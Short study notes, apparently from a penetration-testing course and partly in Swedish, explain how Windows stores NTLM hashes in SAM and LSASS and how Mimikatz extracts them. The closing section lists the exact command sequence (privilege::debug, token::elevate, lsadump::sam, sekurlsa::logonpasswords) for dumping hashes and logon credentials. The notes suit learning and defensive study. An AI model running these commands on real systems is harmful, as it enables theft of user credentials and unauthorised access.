Understanding NTLM and Mimikatz:
- Windows stores hashed passwords in the Security Account Manager (SAM)
- Rainbow Table Attack = precomputed hashes compared to hash (does not work with salting)
- Mimikatz
- Because of the kernel having an exclusive lock on "C:\Windows\system32\config\sam" it cannot be copied or moved. Mimikatz will bypass this.
- Using the "sekurlsa" module it can also extract hashes from process memory at Local Security Authority Subsystem (LSASS).
- LSASS is a process in Windows which handles and caches user authentication, password changes, and access token creation.
- It is run by the SYSTEM account, which is even more privileged than Administrator.
- Mimikatz need to be run as at least Administrator and have "SeDebugPrivilege" access enabled. It lets us debug or own and other users' processes.
- Elevation to SYSTEM can happen through PsExec, or Mimikatz's token elevation function (which requires "SeImpersonatePrivilege", and that is on by default for admins).
Mimikatz Usage:
- Enumerate local users:
Get-LocalUser
- Start Mimikatz as at least Administrator:
.\mimikatz.exe
- Aktivera SeDebugPrivilege:
privilege::debug
- Elevera till SYSTEM:
token::elevate
- Kör arbiträrt kommando. Exempel:
lsadump::sam #Dumpar NTLM hashar från SAM.
sekurlsa::logonpasswords #Dumpar alla logon credentials som kan hittas (lsass).
- Win!